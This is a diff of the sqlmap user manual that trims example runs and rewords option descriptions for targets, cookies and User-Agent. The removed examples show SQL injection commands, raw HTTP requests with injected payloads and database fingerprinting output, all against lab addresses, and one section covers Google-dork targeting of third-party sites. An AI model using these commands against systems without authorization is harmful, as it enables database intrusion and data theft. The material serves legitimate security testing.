-[hh:mm:22] [DEBUG] setting the HTTP method to GET
-[hh:mm:22] [DEBUG] creating HTTP requests opener object
-[hh:mm:22] [DEBUG] parsing XML queries file
-[hh:mm:22] [INFO] using '/home/inquis/sqlmap/output/172.16.213.131/session' as session file
-[hh:mm:22] [INFO] testing connection to the target url
-[hh:mm:22] [INFO] testing if the url is stable, wait a few seconds
-[hh:mm:23] [INFO] url is stable
-[hh:mm:23] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
-[hh:mm:23] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
-[hh:mm:23] [INFO] testing if GET parameter 'id' is dynamic
-[hh:mm:23] [DEBUG] setting match ratio to 0.743
-[hh:mm:23] [INFO] confirming that GET parameter 'id' is dynamic
-[hh:mm:23] [INFO] GET parameter 'id' is dynamic
-[hh:mm:23] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
-[hh:mm:23] [INFO] testing unescaped numeric injection on GET parameter 'id'
-[hh:mm:23] [INFO] confirming unescaped numeric injection on GET parameter 'id'
-[hh:mm:23] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
-[hh:mm:23] [INFO] testing for parenthesis on injectable parameter
-[hh:mm:23] [INFO] the injectable parameter requires 0 parenthesis
-[hh:mm:23] [INFO] testing MySQL
-[hh:mm:23] [INFO] confirming MySQL
-[hh:mm:23] [DEBUG] query: SELECT 2 FROM information_schema.TABLES LIMIT 0, 1
-[hh:mm:23] [INFO] retrieved: 2
-[hh:mm:23] [DEBUG] performed 7 queries in 0 seconds
-[hh:mm:23] [INFO] the back-end DBMS is MySQL
-
-web application technology: PHP 5.2.6, Apache 2.2.9
-back-end DBMS: MySQL >= 5.0.0
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>Example on a <B>MySQL 5.0.67</B> target (verbosity level <B>3</B>):</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 3
-
-[hh:mm:53] [DEBUG] initializing the configuration
-[hh:mm:53] [DEBUG] initializing the knowledge base
-[hh:mm:53] [DEBUG] cleaning up configuration parameters
-[hh:mm:53] [DEBUG] setting the HTTP timeout
-[hh:mm:53] [DEBUG] setting the HTTP method to GET
-[hh:mm:53] [DEBUG] creating HTTP requests opener object
-[hh:mm:53] [DEBUG] parsing XML queries file
-[hh:mm:53] [INFO] using '/home/inquis/sqlmap/output/172.16.213.131/session' as session file
-[hh:mm:53] [INFO] testing connection to the target url
-[hh:mm:53] [TRAFFIC OUT] HTTP request:
-GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1
-Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
-Host: 172.16.213.131
-Accept-language: en-us,en;q=0.5
-Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-User-agent: sqlmap/0.8
-Connection: close
-[...]
-[hh:mm:54] [INFO] testing MySQL
-[hh:mm:54] [TRAFFIC OUT] HTTP request:
-GET /sqlmap/mysql/get_int.php?id=1%20AND%20CONNECTION_ID%28%29=CONNECTION_ID%28%29%20AND%202385=2385 HTTP/1.1
-Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
-Host: 172.16.213.131
-Accept-language: en-us,en;q=0.5
-Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-User-agent: sqlmap/0.8
-Connection: close
-[...]
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>Example on a <B>MySQL 5.0.67</B> target (verbosity level <B>4</B>):</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 4
-
-[...]
-[hh:mm:20] [DEBUG] initializing the configuration
-[hh:mm:20] [DEBUG] initializing the knowledge base
-[hh:mm:20] [DEBUG] cleaning up configuration parameters
-[hh:mm:20] [DEBUG] setting the HTTP timeout
-[hh:mm:20] [DEBUG] setting the HTTP method to GET
-[hh:mm:20] [DEBUG] creating HTTP requests opener object
-[hh:mm:20] [DEBUG] parsing XML queries file
-[hh:mm:20] [INFO] using '/home/inquis/sqlmap/output/172.16.213.131/session' as session file
-[hh:mm:20] [INFO] testing connection to the target url
-[hh:mm:20] [TRAFFIC OUT] HTTP request:
-GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1
-Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
-Host: 172.16.213.131
-Accept-language: en-us,en;q=0.5
-Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-User-agent: sqlmap/0.8
-Connection: close
-
-[hh:mm:20] [TRAFFIC IN] HTTP response (OK - 200):
-Date: Sat, 20 Feb 2010 17:43:00 GMT
-Server: Apache/2.2.9
-X-Powered-By: PHP/5.2.6-1+lenny4
-Vary: Accept-Encoding
-Content-Length: 127
-Connection: close
-Content-Type: text/html
-[...]
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>Example on a <B>MySQL 5.0.67</B> target (verbosity level <B>5</B>):</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 5
-
-[hh:mm:47] [DEBUG] initializing the configuration
-[hh:mm:47] [DEBUG] initializing the knowledge base
-[hh:mm:47] [DEBUG] cleaning up configuration parameters
-[hh:mm:47] [DEBUG] setting the HTTP timeout
-[hh:mm:47] [DEBUG] setting the HTTP method to GET
-[hh:mm:47] [DEBUG] creating HTTP requests opener object
-[hh:mm:47] [DEBUG] parsing XML queries file
-[hh:mm:47] [INFO] using '/home/inquis/sqlmap/output/172.16.213.131/session' as session file
-[hh:mm:47] [INFO] testing connection to the target url
-[hh:mm:47] [TRAFFIC OUT] HTTP request:
-GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1
-Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
-Host: 172.16.213.131
-Accept-language: en-us,en;q=0.5
-Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-User-agent: sqlmap/0.8
-Connection: close
-
-[hh:mm:47] [TRAFFIC IN] HTTP response (OK - 200):
-Date: Sat, 20 Feb 2010 17:44:27 GMT
-Server: Apache/2.2.9
-X-Powered-By: PHP/5.2.6-1+lenny4
-Vary: Accept-Encoding
-Connection: close
-Transfer-Encoding: chunked
-Content-Type: text/html
-
-&lt;html&gt;&lt;body&gt;
-&lt;b&gt;SQL results:&lt;/b&gt;
-&lt;table border="1"&gt;
-&lt;tr&gt;&lt;td&gt;1&lt;/td&gt;&lt;td&gt;luther&lt;/td&gt;&lt;td&gt;blissett&lt;/td&gt;&lt;/tr&gt;
-&lt;/table&gt;
-&lt;/body&gt;&lt;/html&gt;
-[...]
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
+<P>A reasonable level of verbosity to further understand what sqlmap does under the hood is level <B>2</B>, primarily for the detection phase and the take-over functionalities. Whereas if you want to see the SQL payloads the tools sends, level <B>3</B> is your best choice.
+In order to further debug potential bugs or unexpected behaviours, we recommend you to set the verbosity to level <B>4</B> or above. This level is recommended to be used when you feed the developers with a bug report too.</P>
 
 
 <H2><A NAME="ss5.2">5.2</A> <A HREF="#toc5.2">Target</A>
 </H2>
 
-<P>At least one of these options has to be specified to set the source to get
-target addresses from.</P>
+<P>At least one of these options has to be provided.</P>
 
 <H3>Target URL</H3>
 
-<P>Option: <CODE>-u</CODE> or <CODE>-</CODE><CODE>-url</CODE></P>
-
-<P>To run sqlmap against a single target URL.</P>
-
-<P>Example on a <B>MySQL 5.0.67</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1"
-
-[...]
-web application technology: PHP 5.2.6, Apache 2.2.9
-back-end DBMS: MySQL 5
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
+<P>Switch: <CODE>-u</CODE> or <CODE>-</CODE><CODE>-url</CODE></P>
 
+<P>Run sqlmap against a single target URL. This switch requires an argument
+which is the target URL in the form <CODE>http(s)://targeturl/[...]</CODE>.</P>
 
 <H3>Parse targets from Burp or WebScarab proxy logs</H3>
 
-<P>Option: <CODE>-l</CODE></P>
+<P>Switch: <CODE>-l</CODE></P>
 
 <P>Rather than providing a single target URL, it is possible to test and
-inject on HTTP requests proxied through 
-<A HREF="http://portswigger.net/suite/">Burp proxy</A>
-or 
-<A HREF="http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project">WebScarab proxy</A>.</P>
-
-<P>Example passing to sqlmap a WebScarab proxy <CODE>conversations/</CODE> folder:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -l /tmp/webscarab.log/conversations/
-
-[hh:mm:43] [INFO] sqlmap parsed 27 testable requests from the targets list
-[hh:mm:43] [INFO] sqlmap got a total of 27 targets
-[hh:mm:43] [INPUT] url 1:
-GET http://172.16.213.131/phpmyadmin/navigation.php?db=test&amp;token=60747016432606019619a
-c58b3780562
-Cookie: PPA_ID=197bf44d671aeb7d3a28719a467d86c3; phpMyAdmin=366c9c9b329a98eabb4b708c2df8b
-d7d392eb151; pmaCookieVer=4; pmaPass-1=uH9%2Fz5%2FsB%2FM%3D; pmaUser-1=pInZx5iWPrA%3D; 
-pma_charset=iso-8859-1; pma_collation_connection=utf8_unicode_ci; pma_fontsize=deleted; 
-pma_lang=en-utf-8; pma_mcrypt_iv=o6Mwtqw6c0c%3D; pma_theme=deleted
-do you want to test this url? [Y/n/q] n
-[hh:mm:46] [INPUT] url 2:
-GET http://172.16.213.131/sqlmap/mysql/get_int.php?id=1
-Cookie: PPA_ID=197bf44d671aeb7d3a28719a467d86c3
-do you want to test this url? [Y/n/q] y
-[hh:mm:49] [INFO] testing url http://172.16.213.131/sqlmap/mysql/get_int.php?id=1
-[hh:mm:49] [INFO] testing connection to the target url
-[hh:mm:49] [INFO] testing if the url is stable, wait a few seconds
-[hh:mm:50] [INFO] url is stable
-[hh:mm:50] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
-[hh:mm:50] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
-[hh:mm:50] [INFO] testing if Cookie parameter 'PPA_ID' is dynamic
-[hh:mm:50] [WARNING] Cookie parameter 'PPA_ID' is not dynamic
-[hh:mm:50] [INFO] testing if GET parameter 'id' is dynamic
-[hh:mm:50] [INFO] confirming that GET parameter 'id' is dynamic
-[hh:mm:50] [INFO] GET parameter 'id' is dynamic
-[hh:mm:50] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
-[hh:mm:50] [INFO] testing unescaped numeric injection on GET parameter 'id'
-[hh:mm:50] [INFO] confirming unescaped numeric injection on GET parameter 'id'
-[hh:mm:50] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
-[hh:mm:50] [INPUT] do you want to exploit this SQL injection? [Y/n] y
-[hh:mm:29] [INFO] testing for parenthesis on injectable parameter
-[hh:mm:29] [INFO] the injectable parameter requires 0 parenthesis
-[hh:mm:29] [INFO] testing MySQL
-[hh:mm:29] [INFO] retrieved: 99
-[hh:mm:29] [INFO] confirming MySQL
-[hh:mm:29] [INFO] retrieved: 1
-[hh:mm:29] [INFO] retrieved: 9
-web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
-web application technology: PHP 5.2.6, Apache 2.2.9
-back-end DBMS: MySQL >= 5.0.0
-[...]
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
+inject against HTTP requests proxied through 
+<A HREF="http://portswigger.net/suite/">Burp proxy</A> or 
+<A HREF="http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project">WebScarab proxy</A> This switch requires an argument which is the
+proxy's HTTP requests log file.</P>
 
 <H3>Load HTTP request from a file</H3>
 
-<P>Option: <CODE>-r</CODE></P>
+<P>Switch: <CODE>-r</CODE></P>
 
-<P>One of the possibilities of sqlmap is loading of complete HTTP
-request packet stored in textual file. That way you can skip usage of
-bunch of other options.</P>
+<P>One of the possibilities of sqlmap is loading of complete HTTP request
+from a textual file. That way you can skip usage of bunch of other
+options (e.g. setting of cookies, POSTed data, etc).</P>
 
-<P>Sample content of a HTTP request file:</P>
+<P>Sample content of a HTTP request file provided as argument to this switch:</P>
 <P>
 <BLOCKQUOTE><CODE>
 <PRE>
 POST /sqlmap/mysql/post_int.php HTTP/1.1
-Host: 172.16.213.131
+Host: 192.168.136.131
 User-Agent: Mozilla/4.0
 
 id=1
@@ -1256,49 +1111,18 @@ id=1
 </CODE></BLOCKQUOTE>
 </P>
 
-<P>Example usage:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -r request.txt
-
-[...]
-[hh:mm:27] [INFO] parsing HTTP request from 'request.txt'
-[...]
-[hh:mm:21] [INFO] testing if POST parameter 'id' is dynamic
-[hh:mm:22] [INFO] confirming that POST parameter 'id' is dynamic
-[hh:mm:22] [INFO] POST parameter 'id' is dynamic
-[hh:mm:22] [INFO] testing sql injection on POST parameter 'id' with 0 parenthesis
-[hh:mm:22] [INFO] testing unescaped numeric injection on POST parameter 'id'
-[hh:mm:22] [INFO] confirming unescaped numeric injection on POST parameter 'id'
-[hh:mm:22] [INFO] POST parameter 'id' is unescaped numeric injectable with 0 parenthesis
-[hh:mm:22] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
-[hh:mm:22] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
-[hh:mm:22] [INFO] testing for parenthesis on injectable parameter
-[hh:mm:22] [INFO] the injectable parameter requires 0 parenthesis
-[hh:mm:22] [INFO] testing MySQL
-[hh:mm:22] [INFO] confirming MySQL
-[hh:mm:22] [INFO] retrieved: 3
-[hh:mm:22] [INFO] the back-end DBMS is MySQL
-web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
-web application technology: PHP 5.2.4, Apache 2.2.8
-back-end DBMS: MySQL >= 5.0.0
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-
 <H3>Process Google dork results as target addresses</H3>
 
-<P>Option: <CODE>-g</CODE></P>
+<P>Switch: <CODE>-g</CODE></P>
 
 <P>It is also possible to test and inject on <CODE>GET</CODE> parameters on the
 results of your Google dork.</P>
 
 <P>This option makes sqlmap negotiate with the search engine its session
 cookie to be able to perform a search, then sqlmap will retrieve Google
-first 100 results for the Google dork expression with <CODE>GET</CODE> parameters
-asking you if you want to test and inject on each possible affected URL.</P>
+first 100 results for the Google dork expression with <CODE>GET</CODE>
+parameters asking you if you want to test and inject on each possible
+affected URL.</P>
 
 <P>Example of Google dorking with expression <CODE>site:yourdomain.com
 ext:php</CODE>:</P>
@@ -1321,15 +1145,6 @@ url? [y/N/q] n
 GET http://thirdlevel.yourdomain.com/news/example3.php?today=483, do you 
 want to test this url? [y/N/q] y
 [hh:mm:44] [INFO] testing url http://thirdlevel.yourdomain.com/news/example3.php?today=483
-[hh:mm:45] [INFO] testing if the url is stable, wait a few seconds
-[hh:mm:49] [INFO] url is stable
-[hh:mm:50] [INFO] testing if GET parameter 'today' is dynamic
-[hh:mm:51] [INFO] confirming that GET parameter 'today' is dynamic
-[hh:mm:53] [INFO] GET parameter 'today' is dynamic
-[hh:mm:54] [INFO] testing sql injection on GET parameter 'today'
-[hh:mm:56] [INFO] testing numeric/unescaped injection on GET parameter 'today'
-[hh:mm:57] [INFO] confirming numeric/unescaped injection on GET parameter 'today'
-[hh:mm:58] [INFO] GET parameter 'today' is numeric/unescaped injectable
 [...]
 </PRE>
 </CODE></BLOCKQUOTE>
@@ -1338,688 +1153,428 @@ want to test this url? [y/N/q] y
 
 <H3>Load options from a configuration INI file</H3>
 
-<P>Option: <CODE>-c</CODE></P>
+<P>Switch: <CODE>-c</CODE></P>
 
 <P>It is possible to pass user's options from a configuration INI file, an
 example is <CODE>sqlmap.conf</CODE>.</P>
 
-<P>Example usage:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -c "sqlmap.conf"
-
-[hh:mm:42] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
-[hh:mm:42] [WARNING] GET parameter 'cat' is not dynamic
-back-end DBMS:  MySQL >= 5.0.0
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
 <P>Note that if you also provide other options from command line, those are
-evaluated when running sqlmap and overwrite the same options, if set, in
-the provided configuration file.</P>
+evaluated when running sqlmap and overwrite those provided in the
+configuration file.</P>
 
 
 <H2><A NAME="ss5.3">5.3</A> <A HREF="#toc5.3">Request</A>
 </H2>
 
-<P>These options can be used to specify how to connect to the target
-application.</P>
+<P>These options can be used to specify how to connect to the target url.</P>
 
-<H3>HTTP method: <CODE>GET</CODE> or <CODE>POST</CODE></H3>
+<H3>HTTP data</H3>
 
-<P>Options: <CODE>-</CODE><CODE>-method</CODE> and <CODE>-</CODE><CODE>-data</CODE></P>
+<P>Option: <CODE>-</CODE><CODE>-data</CODE></P>
 
 <P>By default the HTTP method used to perform HTTP requests is <CODE>GET</CODE>,
-but you can change it to <CODE>POST</CODE> and provide the data to be sent
-through <CODE>POST</CODE> request. Such data, being those parameters, are
-tested for SQL injection like the <CODE>GET</CODE> parameters.</P>
-
-<P>Example on an <B>Oracle XE 10.2.0.1</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/oracle/post_int.php" --method POST \
-  --data "id=1"
-
-[hh:mm:53] [INFO] testing connection to the target url
-[hh:mm:53] [INFO] testing if the url is stable, wait a few seconds
-[hh:mm:54] [INFO] url is stable
-[hh:mm:54] [INFO] testing if POST parameter 'id' is dynamic
-[hh:mm:54] [INFO] confirming that POST parameter 'id' is dynamic
-[hh:mm:54] [INFO] POST parameter 'id' is dynamic
-[hh:mm:54] [INFO] testing sql injection on POST parameter 'id'
-[hh:mm:54] [INFO] testing numeric/unescaped injection on POST parameter 'id'
-[hh:mm:54] [INFO] confirming numeric/unescaped injection on POST parameter 'id'
-[hh:mm:54] [INFO] POST parameter 'id' is numeric/unescaped injectable
-[...]
-[hh:mm:54] [INFO] testing Oracle
-[hh:mm:54] [INFO] retrieved: 9
-[hh:mm:54] [INFO] confirming Oracle
-[hh:mm:54] [INFO] retrieved: 10.2.0.1.0
-web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
-web application technology: PHP 5.2.6, Apache 2.2.9
-back-end DBMS:    Oracle
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
+but you can implicitly change it to <CODE>POST</CODE> by providing the data to
+be sent in the <CODE>POST</CODE> requests. Such data, being those parameters,
+are tested for SQL injection as well as any provided <CODE>GET</CODE>
+parameters.</P>
 
 
 <H3>HTTP <CODE>Cookie</CODE> header</H3>
 
-<P>Options: <CODE>-</CODE><CODE>-cookie</CODE>, <CODE>-</CODE><CODE>-cookie-urlencode</CODE> and <CODE>-</CODE><CODE>-drop-set-cookie</CODE></P>
+<P>Switches: <CODE>-</CODE><CODE>-cookie</CODE>, <CODE>-</CODE><CODE>-drop-set-cookie</CODE>
+and <CODE>-</CODE><CODE>-cookie-urlencode</CODE> </P>
 
-<P>This feature can be useful in two scenarios:</P>
+<P>This feature can be useful in two ways:</P>
 <P>
 <UL>
 <LI>The web application requires authentication based upon cookies and
 you have such data.</LI>
-<LI>You want to test for and exploit SQL injection on such header
-values.</LI>
+<LI>You want to detect and exploit SQL injection on such header values.</LI>
 </UL>
 </P>
 
-<P>The steps to go through in the second scenario are the following:</P>
+<P>Either reason brings you to need to send cookies with sqlmap requests, the
+steps to go through are the following:</P>
 <P>
 <UL>
-<LI>On Firefox web browser login on the web authentication form while
-dumping URL requests with 
-<A HREF="http://tamperdata.mozdev.org/">TamperData</A> browser's extension.</LI>
-<LI>In the horizontal box of the extension select your authentication
-transaction then in the left box on the bottom click with the right button
-on the <CODE>Cookie</CODE> value, then click on <CODE>Copy</CODE> to save its
-value to the clipboard.</LI>
-<LI>Go back to your shell and run sqlmap.</LI>
+<LI>Login to the application with your favourite browser.</LI>
+<LI>Get the HTTP Cookie from the browser's preferences or from the HTTP
+proxy screen and copy to the clipboard.</LI>
+<LI>Go back to your shell and run sqlmap by pasting your clipboard as
+the argument of the <CODE>-</CODE><CODE>-cookie</CODE> switch.</LI>
 </UL>
 </P>
 
-<P>Example on a <B>Microsoft SQL Server 2000 Service Pack 0</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/cookie_int.php" --cookie \
-  "id=1" -v 1
-
-[hh:mm:37] [INFO] testing connection to the target url
-[hh:mm:37] [INFO] testing if the url is stable, wait a few seconds
-[hh:mm:38] [INFO] url is stable
-[hh:mm:38] [INFO] testing if Cookie parameter 'id' is dynamic
-[hh:mm:38] [INFO] confirming that Cookie parameter 'id' is dynamic
-[hh:mm:38] [INFO] Cookie parameter 'id' is dynamic
-[hh:mm:38] [INFO] testing sql injection on Cookie parameter 'id'
-[hh:mm:38] [INFO] testing numeric/unescaped injection on Cookie parameter 'id'
-[hh:mm:38] [INFO] confirming numeric/unescaped injection on Cookie parameter 'id'
-[hh:mm:38] [INFO] Cookie parameter 'id' is numeric/unescaped injectable
-[...]
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
 <P>Note that the HTTP <CODE>Cookie</CODE> header values are usually separated by
-a <CODE>;</CODE> character, <B>not</B> by an <CODE>&amp;</CODE>.</P>
+a <CODE>;</CODE> character, <B>not</B> by an <CODE>&amp;</CODE>. sqlmap can
+recognize these as separate sets of <CODE>parameter=value</CODE> too, as well
+as GET and POST parameters.</P>
 
-<P>If the web application at first HTTP response has a <CODE>Set-Cookie</CODE>
-header, sqlmap will automatically use it's value in all further HTTP
-requests as the <CODE>Cookie</CODE> header. sqlmap will also automatically
-test that value for SQL injection, except if you run it with
-<CODE>--drop-set-cookie</CODE> option.</P>
+<P>If at any time during the communication, the web application responds with
+<CODE>Set-Cookie</CODE> headers, sqlmap will automatically use its value in
+all further HTTP requests as the <CODE>Cookie</CODE> header. sqlmap will also
+automatically test those values for SQL injection. This can be avoided by
+providing the switch <CODE>-</CODE><CODE>-drop-set-cookie</CODE> - sqlmap will
+ignore any coming <CODE>Set-Cookie</CODE> header.</P>
 
-<P>Example on a <B>Microsoft SQL Server 2000 Service Pack 0</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.128/sqlmap/get_str.asp?name=luther" -v 3
+<P>Vice versa, if you provide a HTTP <CODE>Cookie</CODE> header with
+<CODE>-</CODE><CODE>-cookie</CODE> switch and the target URL sends an HTTP
+<CODE>Set-Cookie</CODE> header at any time, sqlmap will ask you which set of
+cookies to use for the following HTTP requests.</P>
 
-[...]
-[hh:mm:39] [INFO] testing connection to the target url
-[hh:mm:39] [TRAFFIC OUT] HTTP request:
-GET /sqlmap/get_str.asp?name=luther HTTP/1.1
-Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
-Host: 172.16.213.128:80
-Accept-language: en-us,en;q=0.5
-Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
-image/png,*/*;q=0.5
-User-agent: sqlmap/0.8 (http://sqlmap.sourceforge.net)
-Cookie: ASPSESSIONIDSABTRCAS=HPCBGONANJBGFJFHGOKDMCGJ
-Connection: close
+<P>sqlmap by default does <B>not</B> URL-encode generated cookie payloads,
+but you can force it by using the <CODE>-</CODE><CODE>-cookie-urlencode</CODE>
+switch. Cookie content encoding is not declared by HTTP protocol standard
+in any way, so it is solely the matter of web application's behaviour.</P>
 
-[...]
-[hh:mm:40] [INFO] url is stable
-[...]
-[hh:mm:40] [INFO] testing if Cookie parameter 'ASPSESSIONIDSABTRCAS' is dynamic
-[hh:mm:40] [TRAFFIC OUT] HTTP request:
-GET /sqlmap/get_str.asp?name=luther HTTP/1.1
-Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
-Host: 172.16.213.128:80
-Accept-language: en-us,en;q=0.5
-Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
-image/png,*/*;q=0.5
-Cookie: ASPSESSIONIDSABTRCAS=469
-User-agent: sqlmap/0.8 (http://sqlmap.sourceforge.net)
-Connection: close
-
-[hh:mm:40] [WARNING] Cookie parameter 'ASPSESSIONIDSABTRCAS' is not dynamic
-[...]
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>If you provide an HTTP <CODE>Cookie</CODE> header value and the target URL
-sends an HTTP <CODE>Set-Cookie</CODE> header, sqlmap asks you which one to use
-in the following HTTP requests.</P>
-
-<P>Example on a <B>Microsoft SQL Server 2000 Service Pack 0</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.128/sqlmap/get_str.asp?name=luther" --cookie "id=1"
-
-[hh:mm:51] [INPUT] you provided an HTTP Cookie header value. The target url provided its
-own Cookie within the HTTP Set-Cookie header. Do you want to continue using the HTTP cookie
-values that you provided? [Y/n] 
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>sqlmap by default doesn't URL encode generated cookie injections, but you can force it by 
-using the <CODE>-</CODE><CODE>-cookie-urlencode</CODE> flag. Cookie content encoding is not declared
-by standard in any way, so it's solely the matter of web application's behaviour.</P>
+<P>Note that also the HTTP <CODE>Cookie</CODE> header is tested against SQL
+injection if the <CODE>-</CODE><CODE>-level</CODE> is set to <B>2</B> or above.
+Read below for details.</P>
 
 
 <H3>HTTP <CODE>User-Agent</CODE> header</H3>
 
-<P>Options: <CODE>-</CODE><CODE>-user-agent</CODE> and <CODE>-a</CODE></P>
+<P>Switches: <CODE>-</CODE><CODE>-user-agent</CODE> and <CODE>-</CODE><CODE>-random-agent</CODE></P>
 
-<P>By default sqlmap perform HTTP requests providing the following HTTP
-<CODE>User-Agent</CODE> header value:</P>
+<P>By default sqlmap performs HTTP requests with the following <CODE>User-Agent</CODE>
+header value:</P>
 <P>
 <BLOCKQUOTE><CODE>
 <PRE>
-sqlmap/0.8 (http://sqlmap.sourceforge.net)
+sqlmap/0.9 (http://sqlmap.sourceforge.net)
 </PRE>
 </CODE></BLOCKQUOTE>
 </P>
 
-<P>It is possible to fake it with the <CODE>-</CODE><CODE>-user-agent</CODE> option.</P>
+<P>However, it is possible to fake it with the <CODE>-</CODE><CODE>-user-agent</CODE>
+switch by providing custom User-Agent as the switch argument.</P>
 
-<P>Example on an <B>Oracle XE 10.2.0.1</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/oracle/get_int.php?id=1" \
-  --user-agent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" -v 3
-
-[...]
-[hh:mm:02] [INFO] testing connection to the target url
-[hh:mm:02] [TRAFFIC OUT] HTTP request:
-GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1
-Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
-Host: 172.16.213.131
-Accept-language: en-us,en;q=0.5
-Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
-image/png,*/*;q=0.5
-User-agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
-Connection: close
-[...]
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>Providing a text file, <CODE>./txt/user-agents.txt</CODE> or any other
-file containing a list of at least one user agent, to the <CODE>-a</CODE>
-option, sqlmap will randomly select a <CODE>User-Agent</CODE> from the file
-and use it for all HTTP requests.</P>
-
-<P>Example on a <B>MySQL 5.0.67</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 1 \
-  -a "./txt/user-agents.txt"
-
-[hh:mm:00] [DEBUG] initializing the configuration
-[hh:mm:00] [DEBUG] initializing the knowledge base
-[hh:mm:00] [DEBUG] cleaning up configuration parameters
-[hh:mm:00] [DEBUG] fetching random HTTP User-Agent header from file './txt/user-agents.txt'
-[hh:mm:00] [INFO] fetched random HTTP User-Agent header from file './txt/user-agents.txt': 
-Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98) 
-[hh:mm:00] [DEBUG] setting the HTTP method to perform HTTP requests through
-[hh:mm:00] [DEBUG] creating HTTP requests opener object
-[hh:mm:00] [DEBUG] parsing XML queries file
-[hh:mm:00] [INFO] testing connection to the target url
-[hh:mm:00] [TRAFFIC OUT] HTTP request:
-GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1
-Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
-Host: 172.16.213.131
-Accept-language: en-us,en;q=0.5
-Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
-image/png,*/*;q=0.5
-User-agent: Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98) 
-Connection: close
-[...]
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>Note that the HTTP <CODE>User-Agent</CODE> header is tested against SQL
-injection also if you do not overwrite the default sqlmap HTTP
-<CODE>User-Agent</CODE> header value.</P>
+<P>Moreover, by providing the <CODE>-</CODE><CODE>-random-agent</CODE> switch, sqlmap
